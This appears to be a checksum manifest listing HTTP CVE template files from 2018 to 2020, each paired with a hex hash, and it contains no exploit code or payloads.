+http/cves/2018/CVE-2018-16763.yaml:c501a5b8ba8624bdaa2423a30e328a1e1ea1a35c +http/cves/2018/CVE-2018-16836.yaml:471ce5b9944bd915695c221c2bbc88b0bdc70d16 +http/cves/2018/CVE-2018-16979.yaml:bdb44350a0a0ff92747c077e1204866d277e65e5 +http/cves/2018/CVE-2018-17153.yaml:6209778122c7473168193a6f47b8528bcea0680a +http/cves/2018/CVE-2018-17246.yaml:b3efcd00f1b9708934525f279fe496b377d4e518 +http/cves/2018/CVE-2018-17254.yaml:6a898b320bc06fbfdfa756939eccbef9ff44ca6e +http/cves/2018/CVE-2018-17422.yaml:776fdfa45509a562057d840a4cdc8adae06d6427 +http/cves/2018/CVE-2018-17431.yaml:23dd7318820b0bb203139a4c1a08f3d7b8990497 +http/cves/2018/CVE-2018-18069.yaml:e91839265deee9014f3bb57fb3153f8211184b2f +http/cves/2018/CVE-2018-18264.yaml:5ce72e15bde9c43b1d5d3ac837de25eab135b8f4 +http/cves/2018/CVE-2018-18323.yaml:69c6b8fc23c1da30f1dcfc6e840daca5a7618b4f +http/cves/2018/CVE-2018-18570.yaml:ab187cc32b30cbb12861eaacfff1160896e419ef +http/cves/2018/CVE-2018-18608.yaml:790f5b259a90cd1f201b07b0491a51d9752d6543 +http/cves/2018/CVE-2018-18775.yaml:4bc0b891a1861d8f38b5ee2f4c6e044ad5603d2b +http/cves/2018/CVE-2018-18777.yaml:a6e6a6623704d836693f239a9256f54c04e7ef4d +http/cves/2018/CVE-2018-18778.yaml:81850a45596d0c557f696131bffa9559c3653071 +http/cves/2018/CVE-2018-18809.yaml:e4ba9f37f26cd7a550f5ecef4799077d3c96a1e5 +http/cves/2018/CVE-2018-18925.yaml:5c1ae63fdd8edb7bd079fb3edf577a36bb57b961 +http/cves/2018/CVE-2018-19136.yaml:9a28cea00037e4f75e1089883e4ba4987b011634 +http/cves/2018/CVE-2018-19137.yaml:b58cc7b33c6bb488da088a2739751495b1fb326b +http/cves/2018/CVE-2018-19287.yaml:fef121f303c05fec06dea1e33386209ee4f8fb27 +http/cves/2018/CVE-2018-19326.yaml:9380199a541a24a857fc9329b03d9ac167230fd1 +http/cves/2018/CVE-2018-19365.yaml:0439411b5296927c27bd9f366e7b9357ef9eaee7 +http/cves/2018/CVE-2018-19386.yaml:273716bb25c126a3271a605f3308342bae63000a +http/cves/2018/CVE-2018-19439.yaml:c57fd71fc67ae44b9bcea4b6e3e610169fc6379f +http/cves/2018/CVE-2018-19458.yaml:adce76e3cc7034c36f3c2294598e8384ccb3a357 +http/cves/2018/CVE-2018-19749.yaml:ab6f0abd75c4ea5e3d0cc36b5a0dfd8389c92ba8 +http/cves/2018/CVE-2018-19751.yaml:d5c983ed032d3a4e7f633ae79382a6e3c255d1c5 +http/cves/2018/CVE-2018-19752.yaml:a205dc5422ac3e0b739ba6bc8730f8e24258151f +http/cves/2018/CVE-2018-19753.yaml:5ecfcea60b70023fb2f417efa7a528b905380ea9 +http/cves/2018/CVE-2018-19877.yaml:28740de694920842958d2f3f84dae9146bad7116 +http/cves/2018/CVE-2018-19892.yaml:b3ba5974e2dfc714739b5113ff0f5ba098ea7611 +http/cves/2018/CVE-2018-19914.yaml:4dbe8a4a623c315da89763bd1641037d9ad873bc +http/cves/2018/CVE-2018-19915.yaml:1f54947b809c8c1277d43bb4759d9cda919ee6a0 +http/cves/2018/CVE-2018-20009.yaml:a2002cffbb8773bc7788f8f8a9890921ece59be3 +http/cves/2018/CVE-2018-20010.yaml:661c01dffc345114299a70862187bb3bfae6a219 +http/cves/2018/CVE-2018-20011.yaml:36d4b89d5ed578e3a7b6e6cc677b1220137a8cc2 +http/cves/2018/CVE-2018-20462.yaml:e111999ec0f1acbdffcbb71088d1ffdf0aeb4a9d +http/cves/2018/CVE-2018-20463.yaml:113339a79f3ad2dc44cf009310993aaa151769ba +http/cves/2018/CVE-2018-20470.yaml:6f7daa9b3b2b2fe9f21b38102c30df3cbe7c61a0 +http/cves/2018/CVE-2018-20526.yaml:3bdab995538f6dbd791d921fcf2de12659721eaa +http/cves/2018/CVE-2018-20608.yaml:e9fb4a7fb03217c9b6c495a0fc396eed06af54df +http/cves/2018/CVE-2018-20824.yaml:f80c38571c75c1dc80772a60d0924795b5ef652e +http/cves/2018/CVE-2018-20985.yaml:de031bc2752fb85412ec0732000ed3a2dde02581 +http/cves/2018/CVE-2018-2392.yaml:32fb907ca93f23415717c1bdc7f9c24b0ce015fd +http/cves/2018/CVE-2018-2791.yaml:1fc209097069bf1096e680795f4043734bb8e30c +http/cves/2018/CVE-2018-2894.yaml:f869ae295c6a03d28073f04f466f8412a518206b +http/cves/2018/CVE-2018-3167.yaml:fb5c8275d5af7c221dc98aac3e524f8e544ca573 +http/cves/2018/CVE-2018-3238.yaml:872563dd961c49e1aab19a5b155e67695a325b09 +http/cves/2018/CVE-2018-3714.yaml:b87d9a01144667a3dedcec24ca4804a199acecae +http/cves/2018/CVE-2018-3760.yaml:c452f5b252ee6965b0a559a7954ba276226b4824 +http/cves/2018/CVE-2018-3810.yaml:e332826039c1ccaed1f4a031c9888e98c6523905 +http/cves/2018/CVE-2018-5230.yaml:f483a6a184387f28f7c906a2167a6168dddc02b4 +http/cves/2018/CVE-2018-5233.yaml:d1b8389c492bed5455fdfbb4a58b47bb9a7b5217 +http/cves/2018/CVE-2018-5316.yaml:db9a8c986f2d54a6eefe5ee7a80bc938f31a1eb4 +http/cves/2018/CVE-2018-5715.yaml:3feecf1a8c682bba8079873a16366c2e2dae8ba6 +http/cves/2018/CVE-2018-6008.yaml:f11db50a2f66351027b9c5ef2a690626b2c58389 +http/cves/2018/CVE-2018-6184.yaml:b439aaab92e98c457b2dc3f7eef094393d20c619 +http/cves/2018/CVE-2018-6200.yaml:4d824f5ba332b73a7bb8633a25408d20edd76566 +http/cves/2018/CVE-2018-6530.yaml:5c7245727193cd5ce42240f7474369f29ae487b3 +http/cves/2018/CVE-2018-6910.yaml:9db66e557353780ecb4f91252d2712f6a4e9b22d +http/cves/2018/CVE-2018-7251.yaml:12f4ec7ec32730e35d9578c7c682d11600247bc0 +http/cves/2018/CVE-2018-7422.yaml:776412efa55aadf6cc8f6b7c162ebf08cb6ce331 +http/cves/2018/CVE-2018-7467.yaml:3f6295051aa00259678fab92cee91305daffd6d1 +http/cves/2018/CVE-2018-7490.yaml:779445d45774780e1ddacf4490d36952a70538af +http/cves/2018/CVE-2018-7600.yaml:68fc279258df4ffb895d0facf7059c338362d101 +http/cves/2018/CVE-2018-7602.yaml:9f75af21738c5e3347f5e1a0ecbbe652d059d9f7 +http/cves/2018/CVE-2018-7653.yaml:2ca576c53b0f3788c74b13a04616790f6473e8d2 +http/cves/2018/CVE-2018-7662.yaml:df63fdca9d81725f79a9cc2576cce2d216a546dc +http/cves/2018/CVE-2018-7700.yaml:e5d1e98465845cc64b231895a5ddee7ea53fc9ee +http/cves/2018/CVE-2018-7719.yaml:5072247cd8091ed78be936f8ddd4a2c9fac25a79 +http/cves/2018/CVE-2018-8006.yaml:a86f03f1aa9d32bdc5ab973925a2c88dd3569085 +http/cves/2018/CVE-2018-8033.yaml:331ae760b32993120467cf0cd34e563b66b9aaae +http/cves/2018/CVE-2018-8715.yaml:133de2162a80b54d7e1ba4948d658eb66bca1e57 +http/cves/2018/CVE-2018-8719.yaml:fdae6917cc6497d845bd63be6ad9469188b650ef +http/cves/2018/CVE-2018-8727.yaml:113e1f916361ee082bbb663112059035656eeeb1 +http/cves/2018/CVE-2018-8770.yaml:1257bdfb26cbdc251ab7f1d18a10111829c06b9d +http/cves/2018/CVE-2018-9118.yaml:447979ea5423ff5a7dc1042f9c7dcb4a29f449eb +http/cves/2018/CVE-2018-9161.yaml:1dea95e692b2e44f74785c0a952f09458182a446 +http/cves/2018/CVE-2018-9205.yaml:170b98951586af27c49e0e911596fdec4120259b +http/cves/2018/CVE-2018-9845.yaml:4fa7667d88b39aecc62498365e2bd6c385accc86 +http/cves/2018/CVE-2018-9995.yaml:3b2cf9b43901e264319277fc3da248023dd85c9c +http/cves/2019/CVE-2019-0193.yaml:d508b961c5d4af915356f0b10237a97d298764f5 +http/cves/2019/CVE-2019-0221.yaml:eb18652ee27e02574f8be84058b7a9ed21f81d03 +http/cves/2019/CVE-2019-0230.yaml:0d6bd5b2216c01e733db7b000e3cd993bf92f45d +http/cves/2019/CVE-2019-10068.yaml:50dc1ecd22b14eba3c32a979635f2021ec0c78dc +http/cves/2019/CVE-2019-10092.yaml:36b71bad09c685f1cd3ad73852959622f3e77627 +http/cves/2019/CVE-2019-10098.yaml:c1905ae84c4628eaba1db48d9114d796f0ffb167 +http/cves/2019/CVE-2019-1010287.yaml:6cc82294ded19dd80c5ef988a042d508064e45d3 +http/cves/2019/CVE-2019-1010290.yaml:6d412e45708d676c4f571485d7de7631e2b14906 +http/cves/2019/CVE-2019-10232.yaml:9af37d31b5f8f6f88c02d1d72602aae698ea25a2 +http/cves/2019/CVE-2019-10405.yaml:6e821bec37bf35b1e7d49ceb3f9f67db045bc55f +http/cves/2019/CVE-2019-10475.yaml:30fe393eb23f46267183c1039331e046b82be52e +http/cves/2019/CVE-2019-10692.yaml:06abf086fa67f851d866addfdfc2b55116a009af +http/cves/2019/CVE-2019-10717.yaml:f9a425baffb25020a59912a84078799a16170968 +http/cves/2019/CVE-2019-10758.yaml:761650e6d2a47399a1a39fce0fd232fa30b623a9 +http/cves/2019/CVE-2019-11013.yaml:bc97d9a68c91e902ce1a084ccc77f7ffbd7140bb +http/cves/2019/CVE-2019-11248.yaml:7eae19aee32f01e52d5e4b936f010687afae8b46 +http/cves/2019/CVE-2019-11370.yaml:60f158f762e7a6b0a08ac76ec71a33f838d0f7db +http/cves/2019/CVE-2019-11510.yaml:aa75f906ec5631998ef7c2c9906dd84a12f8fedd +http/cves/2019/CVE-2019-11580.yaml:84f9431a930e39f7f7957ba3a85bd44c4e194864 +http/cves/2019/CVE-2019-11581.yaml:e4a228358f449a2ebf92d91b25ecb4f3d09a8e71 +http/cves/2019/CVE-2019-11869.yaml:9bfdeab2d6a7243595a032b62eea9b0c62a0e651 +http/cves/2019/CVE-2019-12276.yaml:0048586547e96c5b359dc2a9683da138b36f9250 +http/cves/2019/CVE-2019-12314.yaml:12d7cf949905b79ab81c1e94b7b07ba38cd3e3a8 +http/cves/2019/CVE-2019-12461.yaml:8b54838148d6ef38ecf377819302e5a8f2798558 +http/cves/2019/CVE-2019-12581.yaml:a5e9bcf3680f46c1bc22ff14306a0ea4b1531a31 +http/cves/2019/CVE-2019-12583.yaml:0015a4ce833a1e906cebf3887181333d75fb9db6 +http/cves/2019/CVE-2019-12593.yaml:3afc61f6f10867d62aa96fe3cd5e194f96c36f14 +http/cves/2019/CVE-2019-12616.yaml:2f6e116aa9b14b825ad730826cbd49f41733f554 +http/cves/2019/CVE-2019-12725.yaml:2d3858103514e5e5f9ba3c90fce56e63b920cbf3 +http/cves/2019/CVE-2019-12962.yaml:7a4661db51284216be799a4cf56e2950e365a557 +http/cves/2019/CVE-2019-12985.yaml:ebcdd87f4b79ccbf5216d537123110a9d9e3c531 +http/cves/2019/CVE-2019-12986.yaml:38f3e4008f9ac7d710e45d66e26e6e573738f5c5 +http/cves/2019/CVE-2019-12987.yaml:364e91ad5665fe1ee0cc497e4d1aecfa9a7721d1 +http/cves/2019/CVE-2019-12988.yaml:2acfe47af105aac710fc2b884d1ef20c503dfae0 +http/cves/2019/CVE-2019-12990.yaml:73cc7c9fc3b150ef3e9133c8a1612fc0cbc19939 +http/cves/2019/CVE-2019-13101.yaml:5189c241ac26a85c30ac9bfbc2b947cdcc5ac12d +http/cves/2019/CVE-2019-13392.yaml:0449cedb31142880140809b95abfd06c51ba5eee +http/cves/2019/CVE-2019-13396.yaml:5ae593e9c8f84f8145a9c37ae4750df9c5bc786e +http/cves/2019/CVE-2019-13462.yaml:e02cee5d54987f3fc1e3ecec655dd0bef7feb6b8 +http/cves/2019/CVE-2019-14205.yaml:902ae588beb862a6c54b4264b7335526e48d5452 +http/cves/2019/CVE-2019-14223.yaml:c98a9434cb14112c0ca8620cc197daa9629e2696 +http/cves/2019/CVE-2019-14251.yaml:f60c03872b61d28f0e62110bbf5be04635861113 +http/cves/2019/CVE-2019-14312.yaml:88d08e40cf31172647cd9698b37bb102a7bb6f9b +http/cves/2019/CVE-2019-14322.yaml:73a7e028ce8a3ae9e770ee0af2242e32da6e3278 +http/cves/2019/CVE-2019-14470.yaml:6e3483e292b686ef615839abb4fbd75f809019e4 +http/cves/2019/CVE-2019-14530.yaml:3b9fadfecb211d321bcee25cd54386a6aea42bc9 +http/cves/2019/CVE-2019-14696.yaml:4cac12de37f2608e8987b94ab30f56bad700ac8d +http/cves/2019/CVE-2019-14750.yaml:6d04bb9cd11dec750e581ad535c3307b320d66e4 +http/cves/2019/CVE-2019-14789.yaml:f94056c62fb856c211a8ad923b7a5d08f702f8aa +http/cves/2019/CVE-2019-14974.yaml:c91eaf086d0715763f38eea8eb0641781bf354a5 +http/cves/2019/CVE-2019-15043.yaml:cd398e759dc4e5fdc960a400b2b86ee56f10d9b7 +http/cves/2019/CVE-2019-15107.yaml:8bf46f61a459ed82178896681d2d66ed26679da1 +http/cves/2019/CVE-2019-15501.yaml:321b92212b39052bcc03b8cee5f14eb68ebce132 +http/cves/2019/CVE-2019-15642.yaml:a04df5126db0605a51f78e3871f6de31ef8a0826 +http/cves/2019/CVE-2019-15713.yaml:970a683953885dd5979fab11a6541449c3d1ee2d +http/cves/2019/CVE-2019-15811.yaml:8235aed0b2216a2a2d40fbd9707bc72e0284c909 +http/cves/2019/CVE-2019-15858.yaml:8da80b637a760fd05fe8d7d167f0b0210731f8d2 +http/cves/2019/CVE-2019-15859.yaml:290b2ce8c54ea8bb7bb6b4675af7185df4a39873 +http/cves/2019/CVE-2019-15889.yaml:578dc1ef8b539a0d2fffb931b6ab9b0749883f79 +http/cves/2019/CVE-2019-16057.yaml:eaee9aabf7dce058e425726478f37151a03ef9a3 +http/cves/2019/CVE-2019-16097.yaml:e3b62f835e31e9883bb56000624e2317854d45d8 +http/cves/2019/CVE-2019-16123.yaml:de9ec7a67634d0a1553408ea50ffd2dcd3aef492 +http/cves/2019/CVE-2019-16278.yaml:e9e9b26d495732ea18200e7f22d75facd82644cd +http/cves/2019/CVE-2019-16313.yaml:88c9b6f71f01323e4142178afc6d824de3420b94 +http/cves/2019/CVE-2019-16332.yaml:1892ee8f51792dc38f8fd809cafee9b555d5229a +http/cves/2019/CVE-2019-16525.yaml:fa4cd47af53da881e306fb97f7d1ebe887d79ae1 +http/cves/2019/CVE-2019-1653.yaml:e55933a681f7d3512614db7ea0fb7ef96ee4b332 +http/cves/2019/CVE-2019-16662.yaml:f25d09e2105bac477987dd6c6c5bad29597cd073 +http/cves/2019/CVE-2019-16759.yaml:17b79cd863d1dd86d01c18e3299f551dc5a24f91 +http/cves/2019/CVE-2019-16920.yaml:437a4db12bea2be5e78c889c0f54f52f574ae99b +http/cves/2019/CVE-2019-16931.yaml:e83d550dcd362f86b479de4028adae5b2ef6ae88 +http/cves/2019/CVE-2019-16932.yaml:61c8d4244c2558033267e70f5094b948dd59922f +http/cves/2019/CVE-2019-16996.yaml:caa4de54e85d279e734dad0512c99f795aa35e81 +http/cves/2019/CVE-2019-16997.yaml:abc81350f4b1d3fafe0ff67d2dc6bba47383cfdd +http/cves/2019/CVE-2019-17270.yaml:8f273cfa7a1ecec3404290f239511373b29c3234 +http/cves/2019/CVE-2019-17382.yaml:2f63c8cf4c6fe37d601a9d44df72e4abe0877984 +http/cves/2019/CVE-2019-17418.yaml:551cee86c5cc3bcd2d2fafa77ccabf41b5bb68a1 +http/cves/2019/CVE-2019-17444.yaml:cb5f6276f40d51d53d58d31d58bcbe46772d948b +http/cves/2019/CVE-2019-17503.yaml:e9a3a11d7586ba3639067ff0304bb2a429dfdb17 +http/cves/2019/CVE-2019-17506.yaml:a3f27e6d90b2524963e8a7dd9fe51cead7c5932a +http/cves/2019/CVE-2019-17538.yaml:8a9bf7601a1a4e58e57cddb963f8aba4e998e5bf +http/cves/2019/CVE-2019-17558.yaml:f21ca4b144bb08fde0d9c6c332d196a200fcf51a +http/cves/2019/CVE-2019-17574.yaml:fb91dd41a940129dbbc57cda206f39a428c16bc4 +http/cves/2019/CVE-2019-17662.yaml:93bfe9a93c474fdd369bc73da68ccc0566475eff +http/cves/2019/CVE-2019-1821.yaml:35332c0e8b527d64c9486d766eb26095652658a2 +http/cves/2019/CVE-2019-18371.yaml:b7e9351988bd395eb3f9499e2b96c4d47737e8e7 +http/cves/2019/CVE-2019-18393.yaml:11cf2cd692131b1014662991d6e7aeddfdf04786 +http/cves/2019/CVE-2019-18394.yaml:b2c78ebf78f0259a5af6f741199bacc3794326f5 +http/cves/2019/CVE-2019-18665.yaml:4abf69bc59912f059285fe3054cf0f844fee73f8 +http/cves/2019/CVE-2019-18818.yaml:cf7c5807d583a1a8f3d9a06a4555e76fae756937 +http/cves/2019/CVE-2019-18922.yaml:dc2527523b16be3ae76e656f3a643934a21415e2 +http/cves/2019/CVE-2019-18957.yaml:197866ab3900b9ed02c6af26d14f0d26f7be4ec8 +http/cves/2019/CVE-2019-1898.yaml:50ab5cf81ce8ade99aa0243346d3db95f2e97657 +http/cves/2019/CVE-2019-19134.yaml:5c174e1808303b8aa1689d033d8a6da454b74a65 +http/cves/2019/CVE-2019-19368.yaml:3f20bd24858e216d25d972cddde9cc5b8d23a5e5 +http/cves/2019/CVE-2019-1943.yaml:fa0d0d8530addbf87d0a3fbce21870625a028d38 +http/cves/2019/CVE-2019-19781.yaml:8d5388c7105acb6175b1fa21446207c307b7bca7 +http/cves/2019/CVE-2019-19824.yaml:68f1fc9586c3e529e8fb7e2b77d1ae2068348312 +http/cves/2019/CVE-2019-19908.yaml:4dc0d15b78108155188aefcd38a7eafe0ce96813 +http/cves/2019/CVE-2019-19985.yaml:b8aafe779833767d0d1bd06271bdd4da519adb28 +http/cves/2019/CVE-2019-20085.yaml:631c18ee7c7b1552964ef7e8d85b10aeca1db2b0 +http/cves/2019/CVE-2019-20141.yaml:f2064243b6b351a50b9efaa8f9e60ce3518fd4d3 +http/cves/2019/CVE-2019-20183.yaml:fc07b4888af5a8a05f1edfb4b69831435f49fbe2 +http/cves/2019/CVE-2019-20210.yaml:f4d9e073c3ee4665ffc1dc84fbc5a4805775255a +http/cves/2019/CVE-2019-20224.yaml:e74a4b18b96203ab96b8df1a6b580d044c2b99a7 +http/cves/2019/CVE-2019-20933.yaml:67ee99e46e5400665d299a8307c188c21eec23a8 +http/cves/2019/CVE-2019-2578.yaml:2c7e940c52209701b02609acc167cf5ebffe394d +http/cves/2019/CVE-2019-2579.yaml:5ad1d7bb899876c85101e47c0479d1d27e5eb429 +http/cves/2019/CVE-2019-2588.yaml:21943299afee23590b52a364f4183e1a5100254d +http/cves/2019/CVE-2019-2616.yaml:c21a1bf31cced519e5cfc1094d9a85345470774a +http/cves/2019/CVE-2019-2725.yaml:0cb677274d83fc43fd4fc36dc9d3ef390e8998d8 +http/cves/2019/CVE-2019-2729.yaml:104666ff05fd1b5e60baa7050b5fd8406c1aa340 +http/cves/2019/CVE-2019-2767.yaml:0e8fd41dcff4e478742e3895b9cdb993b2e7612c +http/cves/2019/CVE-2019-3396.yaml:f0567a6fc2a5338893e8cd4181e066f2a7e2758d +http/cves/2019/CVE-2019-3398.yaml:de8004545265bdd349bf1b807e979b93167aa16b +http/cves/2019/CVE-2019-3401.yaml:acbeb8346da9d7f3d6ea270d3404587e65be9c2f +http/cves/2019/CVE-2019-3402.yaml:3572d21da5bcb0cb722e3f2a3cc2443eeddd8a26 +http/cves/2019/CVE-2019-3403.yaml:224e495a355de11423882b98d2c1c3fdaf08bfdf +http/cves/2019/CVE-2019-3799.yaml:76101fa6bbc2631d7cd38458509bffecc0644d92 +http/cves/2019/CVE-2019-3911.yaml:64e08e12eb067fc1d91778447f70ec0b0d5fa984 +http/cves/2019/CVE-2019-3912.yaml:cbcc6c2ad39e092ce93dd0e6405ac2b158eeb910 +http/cves/2019/CVE-2019-3929.yaml:1df2f28beab0e6436795c07118bdc79a89098cb8 +http/cves/2019/CVE-2019-5127.yaml:84b75b5fe0e98676246207eb57ce9e21c6d77d7f +http/cves/2019/CVE-2019-5418.yaml:f7fe106e004e148f1bd61e1f56f70f17b6ba7e89 +http/cves/2019/CVE-2019-5434.yaml:535bfe05f003c2998f2a7f80b36c4d21109890bd +http/cves/2019/CVE-2019-6112.yaml:98e59290c2896035b01e5063567025f40203af38 +http/cves/2019/CVE-2019-6340.yaml:327d7dc883d72d8b30390e6e427357da9c786891 +http/cves/2019/CVE-2019-6715.yaml:7ee5bdc3fb99dc5c1d973196c33aec9eb3e703f4 +http/cves/2019/CVE-2019-6799.yaml:c0c6c10640ab8423ee4d18671b86213b41cccf25 +http/cves/2019/CVE-2019-6802.yaml:9bdd78e41e91e7778cd650b21b205ca98ea0d9ac +http/cves/2019/CVE-2019-7192.yaml:9c8632794f199897987a3c2b8a5a94465f477673 +http/cves/2019/CVE-2019-7219.yaml:fb00ed3dc166704267a61a613a3284377e36f639 +http/cves/2019/CVE-2019-7238.yaml:a1f0703f21cd9fe779f97b1638b66c6de4d552ab +http/cves/2019/CVE-2019-7254.yaml:7be18e9b3ce66530100e2bd1395ac25f58dd0939 +http/cves/2019/CVE-2019-7255.yaml:79c80751ec4ea0f6f54afb25e15bc2cb9adab252 +http/cves/2019/CVE-2019-7256.yaml:e32bbf22b06f75a37ae0c26b185e996461684da9 +http/cves/2019/CVE-2019-7275.yaml:3048ba938c1a5a2c240a98699e8019de6909fb13 +http/cves/2019/CVE-2019-7315.yaml:c027cc731c6e4527fb57e09698440db53cf307eb +http/cves/2019/CVE-2019-7481.yaml:f3c4832e04248a9e26dd5cbbc149f74bad5f7023 +http/cves/2019/CVE-2019-7543.yaml:ec989b091d1862d8ee0a9637943746a72f2de741 +http/cves/2019/CVE-2019-7609.yaml:95374bf7fb292e2be809081ddfac0c155955c704 +http/cves/2019/CVE-2019-8086.yaml:82b94664f90eda32da55bb07d8426587791e786e +http/cves/2019/CVE-2019-8390.yaml:ed295db56c3c5d1ce91556de48ec8cedd168c52c +http/cves/2019/CVE-2019-8442.yaml:e95a90c8f731ac435b8235a8ac5e8190bb4d10f5 +http/cves/2019/CVE-2019-8446.yaml:93f430c93e087fd024dfa35c47cefa83aa34221b +http/cves/2019/CVE-2019-8449.yaml:fe1747c50141562234651fc5ffb16a3a6742bb0a +http/cves/2019/CVE-2019-8451.yaml:bd293e0019c05ca1eb75b15375e515f62028c8a1 +http/cves/2019/CVE-2019-8903.yaml:065eb7adbbe9e34a9beab5d8e47d839c532d7b12 +http/cves/2019/CVE-2019-8937.yaml:24506c0b3e74f252122225127b8dbd0aa1ae990f +http/cves/2019/CVE-2019-8982.yaml:03c6b13d8fb7d84ed16d4cf78641dbb09b28838b +http/cves/2019/CVE-2019-9041.yaml:0b4f2a11414e8bbd3718067c147817e1b57a74e9 +http/cves/2019/CVE-2019-9618.yaml:fa560583a637ecc2b15cf254f68579b6694bceea +http/cves/2019/CVE-2019-9670.yaml:34282f9e0ee2de7bbb04f155a52575f85c5d7e4d +http/cves/2019/CVE-2019-9726.yaml:e6148d1f1c420bea11a4e7f5310e2cdceae3238e +http/cves/2019/CVE-2019-9733.yaml:69eeb19507fcdcb36ec376cc02b7d684a8079009 +http/cves/2019/CVE-2019-9915.yaml:98d0903029adc95f4c23d30b2dfb0129e534f624 +http/cves/2019/CVE-2019-9922.yaml:91078208db1926b5b45c43419eff854c2a000041 +http/cves/2019/CVE-2019-9955.yaml:866026b805d04c34e89013fad63728e870ff356b +http/cves/2019/CVE-2019-9978.yaml:6fbfaf8ccb46afb958161c07de0775f3607ef018 +http/cves/2020/CVE-2020-0618.yaml:91bc26508074b1fef6246b90a364e5ee48ea8dab +http/cves/2020/CVE-2020-10148.yaml:e7efd7bb996c13ddb9f1fe237a0183e9f75b750b +http/cves/2020/CVE-2020-10199.yaml:4652df4188e8f301352b24646e3001a5e38c3ef1 +http/cves/2020/CVE-2020-10220.yaml:26201097d33bb59f8b61f5e1c6a3ef4de9b32446 +http/cves/2020/CVE-2020-10546.yaml:2168c2a3710a2a74ba531bf510ab5bd4177936f4 +http/cves/2020/CVE-2020-10547.yaml:b6be317aaf16d4f933a17c6a44e3478ee7f3cb4c +http/cves/2020/CVE-2020-10548.yaml:f275643091edcec6570a20fc5b5b4164adff2d3e +http/cves/2020/CVE-2020-10549.yaml:b98d8fb1a169e983fc0558969fa3d0720ec2b587 +http/cves/2020/CVE-2020-10770.yaml:1a65723565b50fe0f6b8e1dec563eeed7757323f +http/cves/2020/CVE-2020-10973.yaml:f0c14dad3a9d9774f1fd3218851123970fa5ba36 +http/cves/2020/CVE-2020-11034.yaml:b1d0235e93162838ab45aa2347d3989a22cd5e77 +http/cves/2020/CVE-2020-11110.yaml:818a8c970126ff88104110f6e6788291bcd61e0b +http/cves/2020/CVE-2020-11450.yaml:1231d1594fcf1212773a0829110d376e48188079 +http/cves/2020/CVE-2020-11455.yaml:555cc680c4cedfc7afae9e06069affa600ddf143 +http/cves/2020/CVE-2020-11529.yaml:59041bc260b439a9a2bc74ae1d432c2b54d5d7ae +http/cves/2020/CVE-2020-11530.yaml:81c8f413c5492e7c6b31ced0dc73c625b12458ab +http/cves/2020/CVE-2020-11546.yaml:e008539c0d191249b479e5d6999c2a5934a35b44 +http/cves/2020/CVE-2020-11547.yaml:1b96f78809e1c211f917ba28e57f17b94f55611a +http/cves/2020/CVE-2020-11710.yaml:d3e48908686657a0f24348a241d3bde61d0e8543 +http/cves/2020/CVE-2020-11738.yaml:5a15a5707640121e80f0deda5c9302512bc47ee3 +http/cves/2020/CVE-2020-11798.yaml:0ec75e6501b83fd61684e508474b5726d50045fa +http/cves/2020/CVE-2020-11853.yaml:3c46198c7cff627feb1b6a4d353b9fab99be0276 +http/cves/2020/CVE-2020-11854.yaml:2b20d238514295d06a4dca3a411f25b7bf2ec086 +http/cves/2020/CVE-2020-11930.yaml:7717686bc92f296a461b5f6a56027949fa9d0683 +http/cves/2020/CVE-2020-11978.yaml:7786aa114e41a099c0c7d4451fc66b133ab3d587 +http/cves/2020/CVE-2020-11991.yaml:4f17a12df05966d12fc1b20bf7ca6f014303bc0a +http/cves/2020/CVE-2020-12054.yaml:3e078822c075e7ea109068448b06508e085c0fa7 +http/cves/2020/CVE-2020-12116.yaml:c4bef6506303753ca0696115f368a805b1fcfb79 +http/cves/2020/CVE-2020-12127.yaml:f73137147b6c968b8491ebe5223d4ef08386f1a4 +http/cves/2020/CVE-2020-12447.yaml:3e63011c52dd6458eeb52d6dc2980de217c0a180 +http/cves/2020/CVE-2020-12478.yaml:59ce6e9b4bf0e552ab1c1f19c3c01e4127571cf1 +http/cves/2020/CVE-2020-12720.yaml:9eb195e5f56b1b69936e1af8ddfdcbe305888767 +http/cves/2020/CVE-2020-12800.yaml:e05f781f4f421ce68e89fae3f0887a957b7aac01 +http/cves/2020/CVE-2020-13117.yaml:68c9c49efa60c4db9288c94889be98c1ed29c676 +http/cves/2020/CVE-2020-13121.yaml:8640e5ca86ba16da26204796ba9672b64ab6e24f +http/cves/2020/CVE-2020-13158.yaml:653b702580fe7c57eaf89c277f02dda6d5c8ce66 +http/cves/2020/CVE-2020-13167.yaml:1ce1c95cccc76111dfc23437ec7ef0215c0ff238 +http/cves/2020/CVE-2020-13258.yaml:b6cad6241810473e71af3524e6a744b369b737e7 +http/cves/2020/CVE-2020-13379.yaml:981eafc40ac895fcfaf7e2518c08de374a58a49a +http/cves/2020/CVE-2020-13405.yaml:97660bea4594d0dbf82d1493f47139aad6ec57f3 +http/cves/2020/CVE-2020-13483.yaml:262b5a84ed4d262ab436fc641c23110e9f90dd71 +http/cves/2020/CVE-2020-13700.yaml:135fb22019d87e872bc2bc9b1b7477702fe03de3 +http/cves/2020/CVE-2020-13820.yaml:fbaba478698736691e1270f8aedc28c0fc90fc29 +http/cves/2020/CVE-2020-13927.yaml:2c1cbd6e0f9602d10dc8e08492bbf3aea054a31d +http/cves/2020/CVE-2020-13937.yaml:107fb157b3a621dfed4b668e7eb2c46c4f865733 +http/cves/2020/CVE-2020-13942.yaml:3b35b049784c6d36312c5583044ef20af637e5cd +http/cves/2020/CVE-2020-13945.yaml:c941654f4e2677ad040e2161237ab471c7cc68fa +http/cves/2020/CVE-2020-14092.yaml:80a00c59876d12a185d682176ea448d281154f67 +http/cves/2020/CVE-2020-14144.yaml:4e7f619b0a9ce7891c0d046545e3c6b8d5474456 +http/cves/2020/CVE-2020-14179.yaml:aebaf90ecacb6d7335c4b135008f31d9e3be64c4 +http/cves/2020/CVE-2020-14181.yaml:88bead9f3caa9c1a3e48ad781c895cac0d627d60 +http/cves/2020/CVE-2020-14408.yaml:5f4b29f0289bbe1fd140ce942123a1a0bd2e6315 +http/cves/2020/CVE-2020-14413.yaml:575cf02e9689252493ae15a8c1f7477915e5f5d7 +http/cves/2020/CVE-2020-14750.yaml:902fb0ba5f8ccd4d16e0dcb9e52b972db8f69fe0 +http/cves/2020/CVE-2020-14864.yaml:d61fcf7988dbcb54bd6a9c23f6ff2ea7f90e6fde +http/cves/2020/CVE-2020-14882.yaml:3efb8e0ea5443ff795760f6338201b6bb03187de +http/cves/2020/CVE-2020-14883.yaml:a82e4f126ac383b22ac870d7926fa890a9ec013e +http/cves/2020/CVE-2020-15050.yaml:9aed44b3eb59e6da800c8bd77b4d2dce730dba1c +http/cves/2020/CVE-2020-15129.yaml:6a09d5839902cee8c22ea0a6f79b8caf4344d37d 